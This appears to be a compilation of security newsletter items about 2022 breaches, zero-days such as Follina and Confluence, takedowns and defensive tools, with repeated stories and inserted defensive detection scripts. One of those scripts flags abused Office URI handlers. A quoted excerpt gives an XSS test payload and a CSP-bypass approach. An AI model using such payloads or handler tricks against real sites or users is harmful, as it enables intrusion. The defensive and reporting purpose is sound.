Avast published a report last week on an email spear-phishing campaign that hit an Australian ISP and which weaponized the Follina Office zero-day (CVE-2022-30190). Microsoft linked this campaign to the GADOLINIUM (APT40) group.
Google GCP VRP
Google has announced the winners of its Google Cloud Platform Vulnerability Research Program for 2021. The first-place prize ($133,337) went to Sebastian Lutz, who found a bug in Identity-Aware Proxy (IAP) that an attacker could have exploited to gain access to a user’s IAP-protected resources by making them visit an attacker-controlled URL and stealing their IAP authentication token.
NCC Group researchers have published a technical analysis of CVE-2022-30790 and CVE-2022-30552, two vulnerabilities in U-Boot, a boot loader popular in some Linux-based embedded systems such as ChromeOS and Android devices.
CodeSec is now free
France’s ANSSI cybersecurity agency has open-sourced another tool for the security community. The tool is called AnoMark and can be used to detect anomalies in command-line arguments run on a system.
Microsoft disrupts Bohrium APT infrastructure
Microsoft’s Digital Crimes Unit (DCU) said on Friday that they disrupted infrastructure operated by Bohrium, a cyber-espionage group operating out of Iran.
Amy Hogan-Burney, DCU General Manager, said the DCU legal team successfully obtained a court order that granted Microsoft control over 41 domains used by the Bohrium group in spear-phishing operations.
“Our DCU investigation found Bohrium targeted customers in the US, Middle East, and India. Targets come from sectors including tech, transportation, government, and education,” Hogan-Burney said.
The Microsoft exec said the group’s members used fake social media profiles, often posing as recruiters, and lured employees at targeted organizations on one of the 41 malicious sites. Here, they tried to collect their personal information, which they later used in subsequent email attacks that sought to infect the victims with malware.
To date, Microsoft’s DCU team has used the US court system to seize domains and server infrastructure from more than two-dozen cybercrime and espionage groups alike.
The court filings can be found here.
Ukrainian TV station hack
Russian hackers have breached the systems of Ukrainian TV station OLL and have broadcast Russian propaganda during the Wales-Ukraine soccer match that decided which of the two teams will attend the World Cup later this year. OLL TV confirmed the incident in a Facebook post, took down its feed, and live-streamed the game on its YouTube channel. (via @cyber_etc)
The apes are gone, again
A threat actor stole 32 NFTs from the Bored Ape Yacht Club collection after they managed to compromise the Discord account of one of its community managers. The threat actor used this compromised account to share a phishing link through which they gained access to BAYC owners’ cryptocurrency wallets. From there, they misappropriated the NFTs and also allegedly stole an additional $145,000 worth of Ether. This is the second hack of BAYC NFTs over the past two months after hackers also stole 54 Bored Ape NFTs valued at more than $13.7 million in April.
Google privacy settlement
Illinois residents are eligible to receive part of a $100 million settlement after an Illinois judge found that Google broke the state’s Biometric Information Privacy Act after the tech giant used a face regrouping tool in the Google Photos app without users’ express permission. Claims can be submitted here.
Telegram privacy accusations
De Spiegel reported last week that instant messaging service Telegram shared the data of some of its users with the German Federal Criminal Police Office (BKA). The report is the first known instance where Telegram has collaborated with the BKA. The German newspaper said the cooperation was related to cases of child abuse and terrorism.
WhatsApp threatens to leave the Netherlands
Facebook has threatened to pull its WhatsApp service from the Netherlands if the local government continues with its plan to force the company to add a backdoor to its service, local media reported.
Microsoft Edge network service sandbox
Microsoft’s Edge web browser now ships with a separate sandbox system for the browser’s network component. The feature shipped with Edge v102 but is disabled by default while its performance is still being tested. The feature previously shipped with Chrome in April, in v100, where it caused some issues in its initial rollout.
New Firefox privacy feature
Mozilla plans to add a new privacy feature to Firefox v102, set to be released later this month. The new feature is named “Query Parameter Stripping,” and works by automatically removing tracking parameters from URLs to improve user privacy. The feature has been available since Firefox v96 but will be enabled by default for all users in the next v102 release. The Brave browser also has a similar feature.
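The stripping described above is a simple URL transformation. Below is an added example of the technique (not Mozilla’s or Brave’s code): it removes a list of query parameter names from a URL while leaving the rest intact. The parameter list is a constructed illustration of the kind of list such a feature uses, not Firefox’s actual list, and matching names case-insensitively is an assumption of this example.

```python
"""Strip known tracking query parameters from URLs.

Added example, not Firefox's implementation. TRACKING_PARAMS is a constructed
list for illustration, not the list Firefox ships.
"""
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Constructed list of tracking parameter names (assumption, not Firefox's list).
TRACKING_PARAMS = frozenset({
    "fbclid", "gclid", "dclid", "msclkid", "mc_eid",
    "utm_source", "utm_medium", "utm_campaign", "utm_term", "utm_content",
})


def strip_tracking_params(url: str, tracking=TRACKING_PARAMS) -> str:
    """Return `url` with any query parameter named in `tracking` removed.

    Scheme, host, path and fragment are preserved; the remaining parameters
    keep their original order. A URL with no query is returned unchanged.
    """
    parts = urlsplit(url)
    if not parts.query:
        return url
    # keep_blank_values so that "?id=" style parameters survive the round trip
    kept = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k.lower() not in tracking]
    # safe="/:" keeps common URL characters in values readable after re-encoding
    new_query = urlencode(kept, safe="/:")
    return urlunsplit((parts.scheme, parts.netloc, parts.path, new_query, parts.fragment))


if __name__ == "__main__":
    sample = "https://example.com/page?id=42&fbclid=abc123&utm_source=newsletter#top"
    print(strip_tracking_params(sample))
```

When every parameter is stripped the “?” disappears as well, which is what a browser feature would want; a proxy that must preserve the exact request form would instead keep the empty query.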
1Password joins FIDO
The 1Password software company, maker of the eponymous password management utility, has formally joined the FIDO Alliance, the industry group behind the new WebAuthn standard.
Russia gets tough on privacy
The Russian Ministry of Digital Development is working on a new legislation draft that will make tech company execs personally liable for the improper collection and storage of the biometric data of Russian citizens. According to Kommersant, execs risk fines of up to 300,000 rubles, a ban from holding certain positions, forced labor, and even up to 10 years in prison. The draft legislation comes after last month, in May, Russia also made execs personally liable for their companies’ lacking IT security, with similar prison sentences on the table for severe security breaches.
Australia’s new cyber minister
Australia now has a dedicated minister for cyber security after Australia’s new Prime Minister Anthony Albanese appointed Clare O’Neil as the Minister for Home Affairs and Minister for Cyber Security last week.
CloudSEK has published a report on the timeline and evolution of Eternity, a financially motivated threat actor group selling worms, stealers, DDoS tools, and ransomware builders.
According to DataBreaches.net, the Pysa ransomware gang dumped the data of more than half a dozen schools last year before the group shut down its leak site.
Windows RDP brute-forcing
A recent report from TRUNC found that 75% of the RDP brute-force attacks the company registered over the past week tried to gain access to their system via the “Administrator” account.
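The statistic above comes from counting failed remote logons by target account. The following added example (not TRUNC’s code) shows the corresponding detection logic over constructed log lines: it parses a flattened export of Windows Security event 4625 (failed logon) with LogonType 10 (RemoteInteractive, which is what an RDP logon records), flags source addresses that produce a burst of failures inside a short window, and computes the share of failures aimed at the built-in Administrator account. The field names match the 4625 event data; the timestamps, addresses and account names are made up.

```python
"""Detect RDP password guessing from failed-logon events.

Added example, not from TRUNC. SAMPLE_LOG is constructed: the field names are
those of Windows Security event 4625, the values are invented.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry). LogonType=10 is RemoteInteractive (RDP).
SAMPLE_LOG = """\
2022-06-01T10:00:01 EventID=4625 LogonType=10 TargetUserName=Administrator IpAddress=203.0.113.5
2022-06-01T10:00:02 EventID=4625 LogonType=10 TargetUserName=Administrator IpAddress=203.0.113.5
2022-06-01T10:00:03 EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.5
2022-06-01T10:00:04 EventID=4625 LogonType=10 TargetUserName=Administrator IpAddress=203.0.113.5
2022-06-01T10:00:05 EventID=4625 LogonType=10 TargetUserName=Administrator IpAddress=203.0.113.5
2022-06-01T10:00:06 EventID=4625 LogonType=10 TargetUserName=Administrator IpAddress=203.0.113.5
2022-06-01T10:12:30 EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=198.51.100.7
2022-06-01T10:15:10 EventID=4625 LogonType=10 TargetUserName=svc_backup IpAddress=198.51.100.7
2022-06-01T10:16:00 EventID=4624 LogonType=10 TargetUserName=jsmith IpAddress=192.0.2.9
2022-06-01T10:17:00 EventID=4625 LogonType=2 TargetUserName=Administrator IpAddress=127.0.0.1
"""


def parse_events(text):
    """Turn 'timestamp key=value ...' lines into dicts with a datetime timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *fields = line.split()
        rec = dict(f.split("=", 1) for f in fields)
        rec["timestamp"] = datetime.fromisoformat(ts)
        events.append(rec)
    return events


def failed_rdp_logons(events):
    """Keep only failed logons (4625) of the RemoteInteractive (RDP) type."""
    return [e for e in events if e.get("EventID") == "4625" and e.get("LogonType") == "10"]


def find_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Return {ip: total_failures} for sources with >= threshold failures in any window."""
    by_ip = defaultdict(list)
    for e in failed_rdp_logons(events):
        by_ip[e["IpAddress"]].append(e["timestamp"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):           # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged


def admin_share(events):
    """Fraction of failed RDP logons aimed at the built-in Administrator account."""
    rdp = failed_rdp_logons(events)
    if not rdp:
        return 0.0
    admin = sum(1 for e in rdp if e["TargetUserName"].lower() == "administrator")
    return admin / len(rdp)


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    print("sources flagged:", find_bruteforce(evs))
    print("share of failures targeting Administrator:", admin_share(evs))
```

The local console failure (LogonType 2) and the successful logon (4624) are deliberately excluded, which is the usual source of false positives when a query keys on the account name alone. Renaming or disabling the built-in Administrator account and requiring a VPN or gateway in front of RDP removes most of the signal this detection relies on, which is the point.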
Bot detection and mitigation service Kasada said that it detected a 750% rise in the use of “solver services” to bypass existing bot detection systems. These solver services are typically maintained by cybercrime groups and provided as a paid service to other groups that want to engage in fraud against an online service, such as online retail stores, social networks, and others.
Banks in Singapore Must Take Steps to Protect Customers from Online Fraud
Banks in Singapore are being required to take steps to help protect customers from online fraud. The new measures require that the banks provide customers with a kill switch that lets them suspend their accounts in the event of a breach. They also have to improve their fraud surveillance systems. Customers are being urged to use mobile banking apps instead of visiting bank sites in browsers.
- Many of the steps required earlier are remedial measures to get up to common practice levels of fraud reduction. The self-service kill switch in place of a phone call seems likely to have unintended consequences of driving calls up when hit accidentally. The move to more use of mobile banking apps reinforces the importance of the mobile telecom service providers and cell phone vendors stepping up the pace of pushing out security updates to all devices, and for Apple and Google to reduce the quantity of fraudulent or “leaky” apps that make it into the Apple App Store and Google Play.
- This is an interesting option; there will be some user training as all parties also learn when not to use this feature. Too often legitimate transactions are mistaken for fraud when the supporting details are inaccurate or truncated, such as POS systems still including test or outdated information in their name. Note the user is expected to call the help desk or use an ATM to initiate the lock. Increased functionality in mobile applications is welcome, but don’t overlook weaknesses in the web interface, APIs or other entry points needed to support online users. Make sure users can equally access supporting details for transactions from all provided entry points.
Atlassian Warns of Confluence Server Vulnerability
Atlassian has released an advisory warning of a critical unauthenticated remote code execution vulnerability in its Confluence Server and Data Center. The flaw, which affects all currently supported versions of Confluence Server and Confluence Data Center, is being actively exploited. There are currently no fixes available for the vulnerability. Atlassian Cloud sites are not affected.
- This vulnerability was found after it was used in an attack against two different companies. So far, there is no patch for this vulnerability. Do not expose your Confluence server to the public. If you find a server exposed: Take it out back and rm -rf it.
- The advisory notes that all supported versions of Confluence are affected, and hints that unsupported versions are as well. Don’t take a chance; implement the mitigations on all instances of Confluence. Apply the update when released, and update unsupported versions or migrate to the Atlassian Cloud service. The mitigations are to either restrict access from the Internet or shut down your instances. The CISA bulletin on CVE-2022-26134 recommends blocking Internet access. Make sure that you are monitoring activity for malfeasance. www.cisa.gov: Atlassian Releases Security Advisory for Confluence Server and Data Center, CVE-2022-26134
Read more in
- Confluence Security Advisory 2022-06-02
- Atlassian: Unpatched critical flaw under attack right now to hijack Confluence
- Critical Atlassian Confluence zero-day actively used in attacks
FBI Blocked Cyberattack Against Boston Children’s Hospital
In a speech at Boston College earlier this week, FBI Director Christopher Wray said that his agency helped to thwart a cyberattack that was targeting Boston Children’s Hospital in 2021. The FBI learned of the impending attack from an intelligence partner.
- All too often notification to law enforcement is the first indication to organizations that they have already been compromised. Good to see the FBI taking timely action to aid in prevention of damage.
- Chalk one up for the good guys. The hospital was able to partner with the FBI and take needed steps to stop the attack. This information triggered the production of subsequent advisories on both healthcare and critical infrastructure protection. Make sure that you have relationships with the FBI, CISA and/or relevant ISOC partners before you need them to facilitate a timely response. Ensure you aren’t overlooking key component security on devices labelled as appliances which silently “just work.”
Read more in
- FBI Blocked Iranian-Backed Cyberattack on Boston Children’s Hospital Last Year.
- FBI thwarted cyberattack against Boston Children’s Hospital
- FBI: Hospital Averted ‘Despicable’ Iranian Cyberattack
VPN Company Will Move Servers Out of India
ExpressVPN says it will move its servers out of India due to new rules recently introduced by India’s Computer Emergency Response Team (CERT-In). ExpressVPN says it cannot comply with the rule’s requirement to retain customers’ names and activity because it does not retain logs of users’ activity. The company also describes the new rule as “incompatible with the purpose of VPNs.”
- This implies that any VPN company still operating in India will comply with data retention laws.
- Keep an eye on regulations for the regions and countries where you operate services. Not all regulators are willing to accept a response of “not technically feasible,” or you may wind up in a perpetual cycle of explaining the impossibility of compliance. Either way, removing operations from that area may be the best overall solution; don’t make that decision in a vacuum, and make sure the C-Suite and board are behind you.
Read more in
- Rejecting data demands, ExpressVPN removes VPN servers in India
- ExpressVPN moves servers out of India to escape customer data retention law
Law enforcement agents from 11 countries have taken down the infrastructure that was supporting the FluBot malware. FluBot has been infecting Android devices since December 2020. The malware disables security features and steals banking app credentials and cryptocurrency account information. FluBot can spread quickly because it accesses contact lists of infected devices.
- The contact list in mobile devices has become a lifeblood for maintaining connections with our friends, partners, and businesses, and synchronization with desktop tools for consistency is now SOP. As such, attention should be paid to what has been granted access to your contacts. Look at application permissions, particularly mobile apps, restricting them to the minimum set. Check for applications you don’t use any longer and remove them. Resist the temptation to install a new app to view a unique content type. Make sure that content type is legitimate long-term, and not a lure.
Read more in
- International Authorities Take Down Flubot Malware Network
- Takedown of SMS-based FluBot spyware infecting Android phones
Foxconn Plant Hit with Ransomware
Electronics manufacturer Foxconn disclosed that one of its production facilities in Mexico was the target of a ransomware attack in late May. The affected plant in Tijuana is “gradually returning to normal,” according to a Foxconn spokesperson.
- The LockBit ransomware group is taking credit for the attack and threatening to publish the exfiltrated information on June 11th. It is expected that the demand is substantial, as LockBit only targets large businesses with the ability to pay large ransom demands. Foxconn manufactures electronics, LCD TVs, mobile devices, and computers for many brands, so there is a risk of substantial IP disclosure. This creates an interesting dilemma as you’re dealing with disclosure of customer data, not just yours. Consider the actions you would need in this scenario, not just to prevent recurrence or redistribute workload to meet customer demand, but also to retain their business.
US Dept. of Justice Seizes Domain Names Used for Cybercrime
Earlier this week, the US Department of Justice (DoJ) seized three domain names that were being used to sell stolen personal information and provide distributed denial-of-service (DDoS) attacks for hire. The WeLeakInfo site claimed to be offering about 7 billion stolen records that contained personally identifiable information (PII).
- In 2020, the WeLeakInfo.com domain was seized, and two suspects were arrested in Ireland and the Netherlands. This action seized the WeLeakInfo.to, ipstress.in and ovh-booter.com domains. The latter two provided booter or stresser services used for DDoS attacks. The FBI is still seeking information on any individuals connected with any of these domains.
Read more in
- WeLeakInfo.to and Related Domain Names Seized
- FBI seizes domains used to sell stolen data, DDoS services
- Authorities seize domain names after probe into sales of stolen personal information
Nakasone: US Conducted Offensive Cyber Ops
General Paul Nakasone, Director of US Cyber Command, said that the US has ”conducted a series of operations across the full spectrum: offensive, defensive, [and] information operations.” Nakasone also said that his agency conducted a “hunt forward” cyber operation in Ukraine shortly before the Russian invasion.
- Use extreme caution with offensive cyber operations. Not only can you become a target if discovered, but you also put affiliated parties at risk. Understand the value and purpose of disclosing these activities. It’s safer to learn from the ongoing battle between Russian threat actors and Ukraine, applying lessons learned to your area, than to actively participate, even though that participation is alluring.
Read more in
- Cyber Command chief confirms US took part in offensive cyber operations
- US Confirms It Has Provided Cybersecurity Support to Ukraine
CISA Says Dominion Voting Machine Flaws Were Not Exploited
The US Cybersecurity and Infrastructure Security Agency (CISA) says that while several vulnerabilities were found in Dominion Voting Systems machines, there is no evidence that the flaws were ever exploited. CISA has notified election officials in states that use the equipment and has provided mitigations.
- The key quote is “Of note, states’ standard election security procedures would detect exploitation of these vulnerabilities and in many cases would prevent attempts entirely.” So, the key is making sure that standard election security procedures are being followed by the large and small government election authorities and that vulnerabilities in processes are being remediated before any exploitation attempt.
- A lot of success can be attributed to defense-in-depth of the procedures, cyber, physical, and operational, supporting the voting process. If you’re a steward of electronic voting machines, make sure that you’re applying updates whenever they are released, not waiting until the last minute because they’re all in storage.
Read more in
- CISA Finds Vulnerabilities in Dominion Voting Machines, No Exploitation
- No evidence of exploitation of Dominion voting machine flaws, CISA finds
Apple App Store stats
Apple published a report on Wednesday summarizing its work in protecting the App Store. The company said that its safety systems blocked more than $1.5 billion in potentially fraudulent transactions, preventing the attempted theft of user funds, and also blocked more than 1.6 million risky and vulnerable apps and app updates. More stats are in the image below.
Back in April, Microsoft teased a new product called Autopatch that could be used to automatically install updates on large fleets of PCs. A first public preview of this upcoming service has been released this week. The service will be offered to Windows 10/11 Enterprise E3 customers in July this year.
Mozilla has released Firefox 101. Patch to fix a bunch of security bugs.
Some Mozilla VPN code goes FOSS
Mozilla has open-sourced this week the source code of its affiliate marketing component that is used to promote its Mozilla VPN service. Mozilla said the “affiliate marketing is a space rife with tons of data collection practices” and they wanted to be transparent about their system and what it collects from new users landing on its service.
ExpressVPN pulls out of India
ExpressVPN, one of the largest VPN providers in the world, has announced that it will pull servers from India after the local government passed a new cybersecurity law that would have mandated the company to collect and store information on all its users.
Voice privacy nightmare
Wired has an excellent report on the future troubles everyone is going to have with (re)securing their voices if voice biometrics and deep fake technology see broader adoption, especially after so many of us have uploaded our voice recordings on social media or have used tools based on voice recognition, such as Alexa or other smart assistants.
Law enforcement agencies from 11 countries have disrupted the operations of the FluBot Android malware gang, Europol announced on Wednesday. The malware, first spotted in December 2020, had built a reputation in recent months for carrying out large-scale SMS spam campaigns that redirected users to malicious sites hosting Android apps infected with its trojan. Once it infected a new smartphone, it would use the device’s contacts list to send out new spam messages and spread further.
The US Department of Justice seized on Wednesday three domains that hosted cybercrime services. Together with Dutch and Belgium police, officials seized ipstress.in and ovh-booter.com, the domains of two DDoS-for-hire services, and weleakinfo.to, a domain used to advertise and sell access to more than 10,000 hacked databases. This last domain was, in fact, a clone of an older service hosted at weleakinfo.com that the DOJ seized back in 2020.
Elasticsearch ransom attacks
Cybersecurity firm Secureworks said that it detected a new wave of ransom attacks targeting Elasticsearch servers that have been left unsecured online. The attackers are demanding a ransom of $620 (paid in Bitcoin) to restore deleted files, and Secureworks said it found this particular ransom note on around 1,200 Elasticsearch databases so far.
Malicious npm package
ReversingLabs said it identified a malicious npm package that would install a cryptocurrency miner on infected systems. The package, named maintainancewebsite, has been removed in the meantime.
EvilCorp evading sanctions
Mandiant said in a report published on Thursday that the EvilCorp cybercrime cartel, which previously operated the Locky, Hades, and the BitPaymer ransomware strains, is now using the LockBit ransomware in recent intrusions. Mandiant said the group has stopped operating its own ransomware strains after sanctions from the US Treasury have made it impossible to receive ransom payments. By using ransomware developed by other gangs, Mandiant said EvilCorp may be trying to avoid US sanctions.
Faking malicious traffic
An unidentified entity has created malware samples that have the Xinjiang Police Files leak site (xinjiangpolicefiles.org) as the command-and-control domain in the hopes of getting the site blacklisted in web browsers.
The Broadcom Symantec security team has published a report on Clipminer, a malware strain that the company said has made at least $1.7 million worth of cryptocurrency for its operators. Symantec said the trojan installed crypto-mining software on infected devices and hijacked transactions by replacing legitimate cryptocurrency addresses inside the infected computer’s clipboard. The malware was first spotted in January 2021, and its operators have used game and pirated software cracks, P2P networks, torrent indexers, or YouTube videos to spread it to victims.
Avast published a technical report on Wednesday on SMSFactory, a new Android malware strain. SMSFactory spreads via malvertising campaigns, and once it infects victims, it generates money for its operators by sending premium SMS and making calls to premium-rate phone numbers from compromised devices.
Trend Micro’s threat research team published a report on Thursday on YourCyanide, a new ransomware strain targeting Windows systems that relies on the CMD utility to spread and encrypt a victim’s files.
Cado Security has an update on the recent TTPs used by the TeamTNT crypto-mining botnet. Per the company, the group’s recent antics have targeted Docker Engine API endpoints and Redis servers.
Conti goes after Intel firmware
The Eclypsium team has published a report on the Conti gang’s use of Intel firmware vulnerabilities in its attacks, based on the gang’s recently leaked internal chat logs.
Palo Alto Networks has published a report on a new malware strain called Popping Eagle. The malware is written in Go and is used as a late-stage backdoor in targeted attacks.
Kaspersky has published a report on LuoYu, a Chinese APT, and its use of a new malware strain named WinDealer. The Russian security firm said LuoYu carried out rare man-on-the-side attacks, where it tried to respond to a victim’s network traffic with trojanized application updates before the legitimate ISP could complete the request. These malicious app updates contained the WinDealer malware, which the attackers used as a backdoor on infected systems to search and exfiltrate sensitive data. Kaspersky said the vast majority of LuoYu victims were located in China.
Group-IB researchers have discovered a new malicious infrastructure and a custom tool of the APT group SideWinder (aka Rattlesnake, Hardcore Nationalist, RAZOR TIGER, T-APT-04, and APT-C-17), a threat actor that is believed to be originating from India and primarily targeting Pakistan. The newly discovered custom tool codenamed SideWinder.AntiBot.Script, is being used in the gang’s phishing attack against Pakistani targets.
Chinese APTs and cybercrime
Recorded Future has published a report summarizing the different incidents where Chinese state-sponsored hacking groups have dabbled in cybercrime targeting neighboring countries. This includes cryptocurrency theft, romance scams, and the theft and trade of PII data.
Backdoor stays in
Following a two-year-long vulnerability disclosure process, Korenix refused to remove a backdoor account from its JetPort serial devices. The vendor told SEC-Consult, the security firm that found the hardcoded backdoor account, that they “will not remove the hardcoded backdoor account as it is needed for customer support and it can’t be cracked in a reasonable amount of time.”
Atlassian said that threat actors are using a new zero-day vulnerability (CVE-2022-26134) to compromise on-premises Confluence servers. The zero-day is an unauthenticated, remote code execution vulnerability in Confluence Server and Data Center systems. There is no patch at the time of writing. Security firm Volexity first identified the attacks, which it said were being used to install JSP web shells on the affected servers, and then a malicious server implant called BEHINDER.
New MSFT zero-day, same core problem
British security researcher Matthew Hickey said he found another zero-day vulnerability in the Office software suite where malicious documents can automatically open a Windows Search window containing remotely-hosted malware executables. The yet-to-be-formally-confirmed zero-day is in the same vein as this Positive Technologies reported bug and the recent Follina (CVE-2022-30190) issue, where attackers are abusing various Office protocol handlers to connect to remote sites and download and run malicious content. In this case, it was the Microsoft Office search-ms: URI handler, while the previous vulnerabilities abused the ms-officecmd: and ms-msdt: handlers.
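The common thread in these three bugs is a document that carries a link whose scheme is a Windows or Office protocol handler rather than http(s). An Office document is a zip of XML parts, and external links live in its relationship parts (the `.rels` files), so a mail gateway or sandbox can triage a document by reading those parts without opening it in Office. The example below is added here and is not Microsoft’s or the researchers’ code: it scans every relationship part of a .docx for external targets using the ms-msdt:, search-ms: or ms-officecmd: schemes. The sample document is constructed in memory with placeholder targets; the scheme list and the choice to treat any such target as a finding are this example’s assumptions.

```python
"""Flag Office documents whose relationships point at risky URI handlers.

Added example, not vendor or researcher code. The scheme list is an assumption
drawn from the three bugs discussed; extend it as new handlers are abused.
"""
import html
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Handlers named in the Follina, ms-officecmd and search-ms reports (assumed list).
RISKY_SCHEMES = {"ms-msdt", "search-ms", "ms-officecmd"}
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TYPE_OLE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
SCHEME_RE = re.compile(r"^\s*([a-z][a-z0-9+.-]*):", re.IGNORECASE)


def find_risky_targets(docx_bytes: bytes):
    """Return [(part_name, target)] for relationships whose target scheme is risky.

    Every *.rels part in the package is inspected, so links hidden in headers,
    footers or embedded parts are caught as well as those in word/document.xml.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                m = SCHEME_RE.match(target)
                if m and m.group(1).lower() in RISKY_SCHEMES:
                    hits.append((name, target))
    return hits


def build_sample_docx(rel_target: str) -> bytes:
    """Construct a minimal docx-like package with one external OLE relationship.

    Constructed test input only: just enough parts to be a valid zip of OOXML
    fragments, not a document Word would necessarily open.
    """
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{REL_TYPE_OLE}" '
        f'Target="{html.escape(rel_target, quote=True)}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder target: only the scheme matters to the check.
    print(find_risky_targets(build_sample_docx("ms-msdt:PLACEHOLDER")))
    print(find_risky_targets(build_sample_docx("https://example.com/page")))
```

This is one layer only: the Follina documents seen in the wild fetched an external HTML page first and invoked the handler from there, so an external http(s) OLE target deserves a look of its own, and the durable fix remains unregistering or restricting the handlers on the endpoint.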
Sophos security researcher Hardik Shah published a technical analysis of CVE-2022-0778, a denial of service vulnerability in the OpenSSL library. The vulnerability can be used to trigger an infinite loop by crafting a certificate that has invalid elliptic curve parameters. Because certificate parsing happens before verification of the certificate signature, any process that parses an externally supplied certificate may be subject to a denial of service attack if it does not use a patched version of the OpenSSL library.
Check Point said it found vulnerabilities in UNISOC baseband chips that open modern smartphones to remote attacks. UNISOC is the fourth largest baseband chipset maker after MediaTek, Qualcomm, and Apple, and is widely used in low-cost Android devices sold across Africa and Asia.
Unpatched Horde webmail bug
Security firm SonarSource published a report this week detailing a vulnerability (CVE-2022-30287) in the Horde webmail application that can allow an authenticated Horde user to execute arbitrary code on the underlying server. The company said that the Horde team patched another bug but passed it as a fix for this issue, meaning the vulnerability remains unpatched.
Cyber security firm ReliaQuest announced on Wednesday that it plans to acquire threat intelligence firm Digital Shadows for $160 million.
Security firm XM Cyber has released a tool called VmwarePasswordDecryptor that can recover and decrypt passwords stored on a local PC and which are used to connect to remote VMWare systems such as ESXi, vSphere, and Workstation.
Amnesty has announced a Digital Forensics Fellowship for anyone interested in helping secure human rights activists and investigate attacks against civil societies across the world. Five positions are available.
FBI thwarts Iranian attack
FBI Director Christopher Wray said that the FBI Boston office blocked a cyberattack orchestrated by Iranian hackers against the Boston Children’s Hospital last year.
shot-scraper: automated screenshots for documentation, built on Playwright: A CLI tool for automating screenshots of web pages, by Simon Willison. You can also have it screenshot just a subsection of the page using CSS selectors.
Web scraping with Python open knowledge: Re Analytics shares best practices for scalable and easy-to-maintain web scraping in Python. See also advanced-scrapy-proxies, a Scrapy proxy rotation package with advanced functions.
Azure/aztfy: A tool to bring existing Azure resources under Terraform’s management.
google/cloud-forensics-utils: A Python library to carry out DFIR analysis on the cloud. Currently supports GCP, Azure, and AWS.
How to Think about Threat Detection in the Cloud: Google’s Anton Chuvakin and Tim Peacock share their views on a foundational framework for thinking about threat detection in public cloud computing.
How to use Atomic Red Team to test Falco rules in K8s: It’s important to test that your security controls and tools actually work! Sysdig’s Jason Avery describes how to use Red Canary’s Atomic Red Team in a Kubernetes environment to confirm that Falco’s rules flag the malicious behavior.
google/santa: A binary authorization system for macOS.
Avoiding Security Alert Hell: Introducing Squyre: Bill Mahony announces Squyre, a new open source tool aimed at reducing analyst fatigue by automatically enriching alerts with helpful context. It uses Lambdas and Step Functions to extract IP addresses, domains, hashes etc. from an alert body, looks them up on various services, and then adds the results to the alert in your ticketing system (e.g. Jira).
Software Supply-Chain Security Reading List: A list of resources by Chainguard covering policy, incidents/threats, solutions, organizations, background, and reports and summaries.
Running Bug Bounty Programs
Eight years of the GitHub Security Bug Bounty program: By GitHub’s Jill Moné-Corallo. GitHub awarded $803,769 in bounties for 235 vulnerabilities in 2021, bringing them to ~$2.4M in total rewards via HackerOne since 2016. Npm has also been added to GitHub’s bug bounty scope.
From Hacker to Bug Bounty Program Owner: A Learning Experience: Braze’s Tommy DeVoss describes the lessons he’s learned in going from a top bug bounty researcher to building Braze’s program. Four big learnings:
- Launching a Bug Bounty Program Takes Cross-Team Collaboration
- Never Lose Sight of Your Relationship With Hackers and Researchers
- Bug Bounties Look Different From the Company Side
- The Work Doesn’t End When a Bug is Identified
cisagov/Malcolm: A powerful, easily deployable network traffic analysis tool suite for full packet capture artifacts (PCAP files) and Zeek logs, by CISA.
A few Tailscale tricks for Security Testers: Pulse Security NZ’s Michael Fincham shares some interesting details about how Tailscale works, including that Tailscale currently only supports ingress access control rules: all outbound network traffic leaving a host is allowed. So if you’ve compromised a machine, you could re-install a modified version of Tailscale to allow any traffic to the device. Also:
As a tailnet administrator you still have to make sure your containers are running with tags rather than a human user if you want to avoid containers being able to leak each other’s environment variables.
See also Tailscale’s Hardening Guide. I feel like I’ve been hearing a lot of good things about Tailscale recently; I’ve been meaning to play with it when I have time.
Hacking Swagger-UI – from XSS to account takeovers: Vidoc Security Lab’s Dawid Moczadło found a DOM XSS in Swagger UI, which he was able to successfully report across 60 different bug bounty programs. Swagger UI had an outdated version of DomPurify, and Dawid found a new way to exploit a known DomPurify bypass.
I think this post is a good example of finding and building on related work to achieve a goal, and maximizing impact.
GitLab had CSP that did not allow me to use event handlers – <img onerror=alert(window.origin) src=1> was blocked. The good thing with Gitlab is that they disclose all of their security issues, so I just searched for XSS and copied the CSP bypass from there ;) (remember to work smart not hard)
Ruby Vulnerabilities: Exploiting Dangerous Open, Send and Deserialization Operations: Bishop Fox’s Ben Lincoln walks through a number of ways to get sweet, sweet remote code execution when testing Rails apps, as well as a sample vulnerable app and example exploit code. Vulnerabilities: Kernel-level open function, insecure send, binary deserialization, YAML deserialization, and Oj JSON Deserialization.
“Follina” exploit in Microsoft Office gives attackers potential backdoor to code execution
